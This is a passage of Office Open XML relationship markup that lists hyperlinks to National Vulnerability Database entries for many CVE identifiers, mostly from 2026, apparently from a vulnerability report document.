Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79782" TargetMode="External" Id="rId497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80238" TargetMode="External" Id="rId498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80428" TargetMode="External" Id="rId499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81800" TargetMode="External" Id="rId500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82526" TargetMode="External" Id="rId501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82854" TargetMode="External" Id="rId502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82859" TargetMode="External" Id="rId503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82876" TargetMode="External" Id="rId504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8323" TargetMode="External" Id="rId505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84479" TargetMode="External" Id="rId506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84480" TargetMode="External" Id="rId507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84695" TargetMode="External" Id="rId508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84696" TargetMode="External" Id="rId509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85146" TargetMode="External" Id="rId510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85148" TargetMode="External" Id="rId511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85154" TargetMode="External" Id="rId512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85183" TargetMode="External" Id="rId513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85391" TargetMode="External" Id="rId514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85424" TargetMode="External" Id="rId515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85425" TargetMode="External" Id="rId516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85426" TargetMode="External" Id="rId517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85428" TargetMode="External" Id="rId518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85433" TargetMode="External" Id="rId519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85434" TargetMode="External" Id="rId520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85435" TargetMode="External" Id="rId521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85437" TargetMode="External" Id="rId522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85438" TargetMode="External" Id="rId523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85440" TargetMode="External" Id="rId524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85595" TargetMode="External" Id="rId525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85602" TargetMode="External" Id="rId526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85663" TargetMode="External" Id="rId527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85667" TargetMode="External" Id="rId528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85672" TargetMode="External" Id="rId529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85695" TargetMode="External" Id="rId530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85696" TargetMode="External" Id="rId531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86121" TargetMode="External" Id="rId532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86184" TargetMode="External" Id="rId533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86189" TargetMode="External" Id="rId534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86190" TargetMode="External" Id="rId535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86296" TargetMode="External" Id="rId536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86543" TargetMode="External" Id="rId537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86738" TargetMode="External" Id="rId538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87929" TargetMode="External" Id="rId539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88069" TargetMode="External" Id="rId540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88860" TargetMode="External" Id="rId541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88864" TargetMode="External" Id="rId542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88866" TargetMode="External" Id="rId543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88867" TargetMode="External" Id="rId544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88868" TargetMode="External" Id="rId545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88869" TargetMode="External" Id="rId546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88877" TargetMode="External" Id="rId547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88899" TargetMode="External" Id="rId548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89042" TargetMode="External" Id="rId549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89249" TargetMode="External" Id="rId550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89253" TargetMode="External" Id="rId551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89254" TargetMode="External" Id="rId552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89255" TargetMode="External" Id="rId553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89256" TargetMode="External" Id="rId554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89258" TargetMode="External" Id="rId555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89259" TargetMode="External" Id="rId556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13737" TargetMode="External" Id="rId557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13745" TargetMode="External" Id="rId558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21095" TargetMode="External" Id="rId559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21096" TargetMode="External" Id="rId560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39923" TargetMode="External" Id="rId561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42945" TargetMode="External" Id="rId562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46713" TargetMode="External" Id="rId563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47243" TargetMode="External" Id="rId564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47839" TargetMode="External" Id="rId565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53790" TargetMode="External" Id="rId566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59679" TargetMode="External" Id="rId567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63382" TargetMode="External" Id="rId568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63385" TargetMode="External" Id="rId569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65638" TargetMode="External" Id="rId570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66047" TargetMode="External" Id="rId571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67276" TargetMode="External" Id="rId572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67367" TargetMode="External" Id="rId573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67402" TargetMode="External" Id="rId574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67443" TargetMode="External" Id="rId575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69255" TargetMode="External" Id="rId576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70460" TargetMode="External" Id="rId577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70478" TargetMode="External" Id="rId578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72836" TargetMode="External" Id="rId579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73414" TargetMode="External" Id="rId580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75856" TargetMode="External" Id="rId581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77635" TargetMode="External" Id="rId582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77645" TargetMode="External" Id="rId583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82067" TargetMode="External" Id="rId584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82090" TargetMode="External" Id="rId585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84189" TargetMode="External" Id="rId586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84197" TargetMode="External" Id="rId587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85427" TargetMode="External" Id="rId588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85614" TargetMode="External" Id="rId589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85625" TargetMode="External" Id="rId590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85694" TargetMode="External" Id="rId591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86117" TargetMode="External" Id="rId592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86426" TargetMode="External" Id="rId593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87930" TargetMode="External" Id="rId594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88880" TargetMode="External" Id="rId595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88881" TargetMode="External" Id="rId596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88882" TargetMode="External" Id="rId597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88887" TargetMode="External" Id="rId598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89243" TargetMode="External" Id="rId599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9277" TargetMode="External" Id="rId600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9317" TargetMode="External" Id="rId601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-4993" TargetMode="External" Id="rId602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-49794" TargetMode="External" Id="rId603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-49796" TargetMode="External" Id="rId604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-51679" TargetMode="External" Id="rId605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-70146" TargetMode="External" Id="rId606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10059" TargetMode="External" Id="rId607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13221" TargetMode="External" Id="rId608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16272" TargetMode="External" Id="rId609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16503" TargetMode="External" Id="rId610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17057" TargetMode="External" Id="rId611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17207" TargetMode="External" Id="rId612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18412" TargetMode="External" Id="rId613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18753" TargetMode="External" Id="rId614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18754" TargetMode="External" Id="rId615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18924" TargetMode="External" Id="rId616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19646" TargetMode="External" Id="rId617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19874" TargetMode="External" Id="rId618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-22590" TargetMode="External" Id="rId619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-2332" TargetMode="External" Id="rId620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27690" TargetMode="External" Id="rId621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27962" TargetMode="External" Id="rId622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33186" TargetMode="External" Id="rId623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39830" TargetMode="External" Id="rId624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39832" TargetMode="External" Id="rId625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41869" TargetMode="External" Id="rId626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42044" TargetMode="External" Id="rId627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42508" TargetMode="External" Id="rId628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42579" TargetMode="External" Id="rId629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42584" TargetMode="External" Id="rId630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45100" TargetMode="External" Id="rId631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45537" TargetMode="External" Id="rId632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45764" TargetMode="External" Id="rId633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47702" TargetMode="External" Id="rId634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48024" TargetMode="External" Id="rId635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48031" TargetMode="External" Id="rId636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48039" TargetMode="External" Id="rId637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48162" TargetMode="External" Id="rId638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49364" TargetMode="External" Id="rId639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49441" TargetMode="External" Id="rId640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49849" TargetMode="External" Id="rId641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50152" TargetMode="External" Id="rId642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51346" TargetMode="External" Id="rId643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52723" TargetMode="External" Id="rId644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52766" TargetMode="External" Id="rId645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53793" TargetMode="External" Id="rId646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53939" TargetMode="External" Id="rId647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55247" TargetMode="External" Id="rId648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55248" TargetMode="External" Id="rId649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55511" TargetMode="External" Id="rId650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55536" TargetMode="External" Id="rId651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55640" TargetMode="External" Id="rId652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57499" TargetMode="External" Id="rId653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58400" TargetMode="External" Id="rId654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61800" TargetMode="External" Id="rId655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62646" TargetMode="External" Id="rId656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62862" TargetMode="External" Id="rId657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67593" TargetMode="External" Id="rId658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67598" TargetMode="External" Id="rId659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69641" TargetMode="External" Id="rId660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70452" TargetMode="External" Id="rId661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73069" TargetMode="External" Id="rId662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 